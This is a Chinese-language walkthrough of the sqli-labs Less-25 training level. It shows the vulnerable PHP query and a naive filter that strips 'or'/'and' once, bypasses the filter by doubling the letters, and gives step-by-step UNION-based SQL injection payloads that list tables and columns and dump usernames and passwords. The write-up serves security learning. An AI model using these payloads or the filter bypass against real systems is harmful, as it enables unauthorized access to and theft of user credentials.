当前位置：首页 > java >正文

sqli-labs：Less-25关卡详细解析

java 2025/8/7 12:56:45

1. 思路🚀

本关的SQL语句为：

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

注入类型：字符串型（单引号包裹）、GET操作
提示：参数需以'闭合
关键参数：id

php输出语句的部分代码：

if($row)
{echo '<font color= "#0000ff">';	echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "</font>";
}
else 
{echo '<font color= "#FFFF00">';print_r(mysql_error());echo "</font>";  
}

本关卡实现了对or和and字符的过滤，并使用空格进行了替换(不区分大小写)，因此不能直接使用这两个。但既然对其进行空格替换，而且只进行1次替换，那么完全可以将or改写为oorr，将and改写为aandnd，接下来正常注入即可。

function blacklist($id)
{$id= preg_replace('/or/i',"", $id);		//strip out OR (non case sensitive)$id= preg_replace('/AND/i',"", $id);		//Strip out AND (non case sensitive)return $id;
}

在这里插入图片描述

2. 手工注入步骤🎯

我的地址栏是：http://localhost:8081/Less-25/，从?id=开始，只需要将下面的sql语句粘贴即可。

2.1. 判断字段数⚡

注意order中的or，需要修改为oorrder

1' oorrder by 4 --+

在这里插入图片描述

回显信息，同时说明字段数为3。

2.2. 判断回显位⚡

-1' union select 1,2,3 --+

在这里插入图片描述

2.3. 获取基本信息⚡

-1' union select 1,database(),user() --+

在这里插入图片描述

2.4. 获取表名⚡

注意information_schema中的or，需要修改为infoorrmation_schema

-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema = 'security' --+

在这里插入图片描述

2.5. 获取字段⚡

注意information_schema中的or，需要修改为infoorrmation_schema，将and修改为aandnd

-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema = 'security' aandnd table_name = 'users' --+

在这里插入图片描述

2.6. 获取数据⚡

注意password中的or，需要修改为passwoorrd

-1' union select 1,group_concat(username),group_concat(passwoorrd) from users --+

在这里插入图片描述

2.7. 参数汇总表⭐

参数	作用	示例
`'`	闭合符号	`id='`
`--+`	闭合符号	`--+`
`order by`	判断字段数	`order by 4`
`union select`	联合查询	`union select 1,2,3`
`group_concat()`	合并结果	`group_concat(table_name)`
`information_schema`	系统数据库	`from information_schema.tables`
`table_schema`	数据库名称	`table_schema='security'`
`table_name`	数据表名称	`table_name='users'`
`column_name`	字段名称	`group_concat(column_name)`